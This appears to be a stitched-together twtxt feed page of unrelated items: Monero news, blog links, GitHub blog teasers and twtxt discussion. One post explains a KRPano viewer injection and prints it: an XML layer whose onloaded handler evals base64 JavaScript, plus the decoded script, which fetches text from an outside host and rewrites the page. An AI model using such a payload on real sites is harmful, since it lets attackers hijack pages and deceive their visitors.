Anon donates ~23 XMR to Monero General Fund
An anonymous contributor has donated a total of 23.4965657 XMR (~5.1K USD)1 to the Monero General Fund address2.

plowsof’s monero-fund-watch 3 Python script tweeted4 the donation alert earlier today:

💝 +23.4965657 #xmr 💝 $5155.15

This is an ongoing story and the report will be updated when new information is available.

1. [https://www.p2pool.io/explorer/tx/27cd1a2f3b032d8a267c6372f6c3ee5a539f511 … ⌘ Read more

10 “Ancient Alien” Artifacts That Have Mundane Explanations
Many relics of human history are so mysterious and wondrous that the imagination, at times, is tempted to run away from the seemingly commonplace and rather unimpressive explanations mainstream archaeology offers. Pseudo-archaeology instead makes more dramatic and appealing solutions, which are nevertheless based more on the need to believe rather than on rigorous scientific investigation. […]

The post [10 “Ancient A … ⌘ Read more

10 Everyday Terms with Surprising Historical Origins
Some of the terms we use every day have fascinating historical roots that reflect cultural exchanges, misunderstandings, or adaptations over time. From beverages to sports and beyond, these words carry with them stories of how people adapted traditions or misunderstood foreign concepts. Here are 10 examples of terms with historical origins that reveal much more […]

The post [10 Everyday Terms with Surprising Historical Origins]( … ⌘ Read more

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

Monero Research Lab meeting scheduled for 15 January 2025 1700 UTC
The next Monero Research Lab1 meeting is scheduled to take place on Wednesday, January 15th 2025 at 17:00 UTC on IRC-Libera/Matrix2 in the #monero-research-lab channels.

• Updates. What is everyone working on?
  
• Discussion: Post-quantum security and ethical considerations over elliptic curve cryptography3
  
• AOB
  

This meeting’s chairperson should be Rucknium4. The … ⌘ Read more

Haveno adds support for buying XMR without security deposit
woodser1 has released Haveno2 version 1.0.153 with support for buying Monero (initial purchases XMR) without security deposits4, which greatly simplifies the onboarding process for new traders:

Support buying XMR without deposit using passphrase
Increase limits: crypto to 528, very low risk to 132, pay by mail to 48
Support USDC
Show available Moner ... ⌘ [Read more](https://monero.observer/haveno-v1.0.15-released-support-buying-monero-without-security-deposit/)

On my blog: Devils, in Detail https://john.colagioia.net/blog/2024/12/15/devils-detail.html #ethics #harm #media #rant

Monero Dev Activity Report - Week 15 2024: 11 PRs, 15 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.

Opened (6)

monero-project/monero:

• #96121 Update monero-over-tor.sh (XMRZombie)
  
• #96152 contrib: force (de)serialization to create params section incase there is none RELEASE
  
• #96163 p2 … ⌘ Read more

Apple Removes Ability to Run Unsigned Apps in macOS 15.1
Big Tech’s war against “sideloading” continues. With Microsoft and Google not far behind. ⌘ Read more

[LTH] [0.15 XMR] Convert isometric token image from Wordpress to Monero icon

A new privacy focused hosting platform which only accepts Monero as a currency needs a conversion of this isometric logo of Wordpress, to be exactly the same however, using Monero color scheme and icon: https://file.io/clebBxqHX9UV

Link: https://bounties.monero.social/posts/160/

n/a ⌘ Read more

[LFF] [$255] My 3 months of server hosting is open for donations

Server costs for MoneroResearch.info, bchmempool.cash, Rucknium.me, fusionstats.redteam.cash, and Monero public RPC node at http://rucknium.me:18081

Link: https://rucknium.me/donate/

@r​ucknium:monero.social ⌘ Read more

@movq@www.uninformativ.de How hard would it be to implement something like (#<2024-10-25T17:15:50Z https://www.uninformativ.de/twtxt.txt>)in jenny as a replacement for (#twthash) and have it not care about if is http(s) or a g-protocol?

Bit2Me to delist XMR on October 31 2024 due to ‘regulatory change’
Spain-based crypto CEX Bit2Me 1 has announced plans2 to delist Monero from their platform on October 31 2024 at 11:00 UTC due to a regulatory change:

Based on the latest reviews due to a regulatory change, we have decided to delist Monero (XMR) on October 31, 2024, at 11:00 UTC. Starting from October 24 at 15:00 UTC, it will no longer be possible to buy, trade, or deposit Monero (XMR) on Bit2Me. [..] Withdrawals … ⌘ Read more

Community Workgroup Meeting scheduled for 26 October 2024 1500 UTC
The next Monero Community Workgroup Meeting is scheduled1 to take place on Saturday, 26th of October 2024 at 15:00 UTC, in the #monero-community 2’3 channels.

Discussions should be focused on community highlights, CCS updates and workgroup reports. plowsof4 will moderate the meeting.

Logs and summary for the previous meeting are available on Monero Observer5.

_This is an ongoin … ⌘ Read more

Monero Dev Activity Report - Week 42 2024: 27 PRs, 14 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.

Opened (8)

monero-project/monero:

• #95231 build: bump minimum macos version to 10.15 (tobtoht)
  
• #95222 blockchain_utilities: add tool to track running counts of locked outputs (jeffro256)
  
• #95253 te … ⌘ Read more

m2049r releases Monerujo v4.0.8 ‘Sidekick’
m2049r1 has released Monerujo2 version 4.0.8 Sidekick 3 with fixes for crashes on Android 14/15.

Option to lock wallet in background
Support for Sidekick Wallet
Update default nodes
Fix crashes on Android 14/15
Fix connectivity issues with Ledger

It is worth noting that Monerujo added support for its companion app Sidekick4 last month (v4.0.6), as reported5.

Before usage, it is re … ⌘ Read more

[WTS] [CA] [$15] Monero Stickers

5 stickers that you can place anywhere to market this private, untraceable money.

Link: https://xmrbazaar.com/listing/tDUb/

PaPaMorty (XMRBazaar) ⌘ Read more

Community Workgroup Meeting scheduled for 12 October 2024 1500 UTC
The next Monero Community Workgroup Meeting is scheduled1 to take place on Saturday, 12th of October 2024 at 15:00 UTC, in the #monero-community 2’3 channels.

Discussions should be focused on community highlights, CCS updates and workgroup reports. plowsof4 will moderate the meeting.

Logs and summary for the previous meeting are available on Monero Observer5.

_This is an ongoin … ⌘ Read more

Cuprate Meeting scheduled for 15 October 2024 1800 UTC
The next Cuprate Meeting is scheduled1 to take place on Tuesday, October 15 2024 at 18:00 UTC on IRC-Libera/Matrix2 in the #cuprate channels.

Cuprate is an effort to create an alternative Monero node implementation.

Greetings
Updates: What is everyone working on?
Project: What is next for Cuprate?
Any other business

The meeting’s moderator should be Boog9003. Consult the Cuprate code … ⌘ Read more

SNeedlewoods submits CCS proposal for 1 month of part-time Monero dev work
SNeedlewoods1 has submitted their first CCS proposal2 to work part-time on Monero development for 1 month:

For this proposal the focus of work will be on the new wallet API [..] The work is already ongoing since May 2024 [..] This is a “pilot” proposal to see how things work out. [..] Hopefully I will become a long term contributor for general development.

Funding proposed: 2.15 XMR (10-15 hour ... ⌘ [Read more](https://monero.observer/sneedlewoods-submits-monero-dev-work-ccs-proposal/)

Last week at The Lunduke Journal (Sep 15 - Sep 21, 2024)
Real-Time Linux! Dystopian AI Future! Fake AI Podcasts! Exploding Pagers! ⌘ Read more

I have noticed that twtxt timestamps differ. For example:

• @prologic@twtxt.net (and I assume any Yarn user)
  2024-09-18T13:16:17Z
  
• @lyse@lyse.isobeef.org
  2024-09-17T21:15:00+02:00
  
• @aelaraji@aelaraji.com (and @movq@www.uninformativ.de, and me)
  2024-09-18T05:43:13+00:00
  

So, which is right, or best?

On my blog: Chosen https://john.colagioia.net/blog/2024/09/15/chosen.html #fiction #freeculture

@prologic@twtxt.net Here’s a log entry:

Aug 27 15:59:43 buc yarnd[1200580]: [yarnd] 2024/08/27 15:59:43 (IP_REDACTED) "GET /external?nick=lovetocode999&uri=https://URL_REDACTED HTTP/1.1" 200 35442 14.554763ms

HTTP 200 status, not 404.

On my blog: Real Life in Star Trek, Conundrum https://john.colagioia.net/blog/2024/08/15/conundrum.html #scifi #startrek #closereading

@prologic@twtxt.net There are a lot of logs being generated by yarnd, which is something I haven’t seen before too:

Jul 25 14:32:42 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:42 (162.211.155.2) "GET /twt/ubhq33a HTTP/1.1" 404 29 643.251µs
Jul 25 14:32:43 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:43 (162.211.155.2) "GET /twt/112073211746755451 HTTP/1.1" 400 12 505.333µs
Jul 25 14:32:44 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:44 (111.119.213.103) "GET /twt/whau6pa HTTP/1.1" 200 37360 35.173255ms
Jul 25 14:32:44 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:44 (162.211.155.2) "GET /twt/112343305123858004 HTTP/1.1" 400 12 455.069µs
Jul 25 14:32:44 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:44 (168.199.225.19) "GET /external?nick=lovetocode999&uri=http%3A%2F%2Fwww.palapa.pl%2Fbaners.php%3Flink%3Dhttps%3A%2F%2Fwww.dwnewstoday.com HTTP/1.1" 200 36167 19.582077ms
Jul 25 14:32:44 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:44 (162.211.155.2) "GET /twt/112503061785024494 HTTP/1.1" 400 12 619.152µs
Jul 25 14:32:46 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:46 (162.211.155.2) "GET /twt/111863876118553837 HTTP/1.1" 400 12 817.678µs
Jul 25 14:32:46 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:46 (162.211.155.2) "GET /twt/112749994821704400 HTTP/1.1" 400 12 540.616µs
Jul 25 14:32:47 buc yarnd[1911318]: [yarnd] 2024/07/25 14:32:47 (103.204.109.150) "GET /external?nick=lovetocode999&uri=http%3A%2F%2Fampurify.com%2Fbbs%2Fboard.php%3Fbo_table%3Dfree%26wr_id%3D113858 HTTP/1.1" 200 36187 15.95329ms

I’ve seen that nick=lovetocode999 a bunch.

@prologic@twtxt.net Alright, running yarnd 0.15.1 now. I stopped my hack so we’ll see if the VPS gets clogged with junk 😆

@prologic@twtxt.net 0.15.1, looks like.

On my blog: Toots 🦣 from 07/15 to 07/19 https://john.colagioia.net/blog/2024/07/19/week.html #linkdump #mastodon #socialmedia #week

On my blog: Developer Diary, Queen Yun https://john.colagioia.net/blog/2024/07/15/yun.html #programming #project #devjournal

Last week at The Lunduke Journal (June 9 - June 15, 2024)
Firefox! Russia! WWDC! Open Source A.I.! ⌘ Read more

On my blog: Free Culture Book Club — Nevada, part 2 https://john.colagioia.net/blog/2024/06/15/nevada-2.html #freeculture #bookclub

On my blog: Toots 🦣 from 04/15 to 04/19 https://john.colagioia.net/blog/2024/04/19/week.html #linkdump #mastodon #socialmedia #week

On my blog: Developer Diary, Universal Day of Culture https://john.colagioia.net/blog/2024/04/15/culture.html #programming #project #devjournal

On my blog: Toots 🦣 from 03/11 to 03/15 https://john.colagioia.net/blog/2024/03/15/week.html #linkdump #mastodon #socialmedia #week

On my blog: Real Life in Star Trek, First Contact https://john.colagioia.net/blog/2024/02/15/first-contact.html #scifi #startrek #closereading

Build code security skills with the GitHub Secure Code Game
Learn to find and fix security issues while having fun with Secure Code Game, now with new challenges focusing on JavaScript, Python, Go, and GitHub Actions!

The post Build code security skills with the GitHub Secure Code Game appeared first on The GitHub Blog. ⌘ Read more

On my blog: Toots 🦣 from 01/15 to 01/19 https://john.colagioia.net/blog/2024/01/19/week.html #linkdump #mastodon #socialmedia #week

On my blog: Developer Diary, Wikipedia https://john.colagioia.net/blog/2024/01/15/wikipedia.html #programming #project #devjournal

On my blog: Toots 🦣 from 12/11 to 12/15 https://john.colagioia.net/blog/2023/12/15/week.html #linkdump #mastodon #socialmedia #week

Universe’s key takeaway: Innovate better with AI-powered workflows on a single, unified platform
Discover new AI-powered features and tools to help developers stay in the flow and organizations innovate at scale.

The post [Universe’s key takeaway: Innovate better with AI-powered workflows on a single, unified platform](https://github.blog/2023-11-15-universes-key-takeaway-innovate-better-with-ai-powered-workflows-on-a-single-unified-pla … ⌘ Read more

@prologic@twtxt.net Any of these work? https://gadgetstouse.com/blog/2023/05/15/bypass-ad-blockers-not-allowed-on-youtube/

The clock is ticking: Atlassian’s support for Bitbucket Server ends on February 15, 2024
Atlassian is ending support for its Server products—including Bitbucket Server—in February 2024. In this post, you’ll learn what that means for you, your options, and how you can move to GitHub.

The post [The clock is ticking: Atlassian’s support for Bitbucket Server ends on February 15, 2024](https://github.blog/2023-10-17-the-clock-is-ticking-atlassians-support … ⌘ Read more

Linux Kernel Maintainer Chastises Lunduke
Listen now (15 mins) | Lunduke’s Big Tech Show - October 12th, 2023 ⌘ Read more

The Eternal Cycle of Software Bloat
Listen now (15 mins) | Lunduke’s Big Tech Show - October 6th, 2023 ⌘ Read more

On my blog: Toots 🐘 from 09/11 to 09/15 https://john.colagioia.net/blog/2023/09/15/week.html #linkdump #mastodon #socialmedia #week

Build for today, transform for tomorrow at GitHub Universe 2023
Get tickets to our global developer and customer event for 30% off during our Super-Early Bird special, only for a limited time.

The post Build for today, transform for tomorrow at GitHub Universe 2023 appeared first on The GitHub Blog. ⌘ Read more

Release Radar · July 2023 Edition
After the last Release Radar, I promised the next one wouldn’t be far away, so here it is. This is the low down on some of the best open source projects that shipped major version updates in July. There’s lots of cool stuff from natural language processing, to APIs, money, and SDKs. I won’t spoil […]

The post Release Radar · July 2023 Edition appeared first on The GitHub Blog. ⌘ Read more

Hardening repositories against credential theft
Some best practices and important defenses to prevent common attacks against GitHub Actions that are enabled by stolen personal access tokens, compromised accounts, or compromised GitHub sessions.

The post Hardening repositories against credential theft appeared first on The GitHub Blog. ⌘ Read more

On my blog: Free Culture Book Club — Archive of Our Own, part 1 https://john.colagioia.net/blog/2023/07/15/ao3-1.html #freeculture #bookclub